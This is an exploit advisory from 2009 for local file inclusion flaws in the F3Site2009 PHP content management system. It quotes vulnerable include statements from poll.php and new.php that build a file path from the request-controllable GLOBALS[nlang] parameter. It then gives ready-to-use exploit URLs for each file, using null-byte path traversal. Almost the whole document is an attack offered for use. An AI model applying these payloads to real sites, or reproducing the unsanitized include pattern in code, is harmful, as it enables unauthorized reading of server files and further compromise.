##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit               ##
## Date: 18-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/f3site/              ##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################
 
~ Code [poll.php] :
 
if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):
   include('./cache/poll_'.$GLOBALS['nlang'].'.php');
 
~ 3xplo!t :
 
 [F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]
 
 
~ Code [new.php] :
 
if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))
{
    include './cache/new-'.$GLOBALS['nlang'].'.php';
}
 
~ 3xplo!t :
 
 [F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]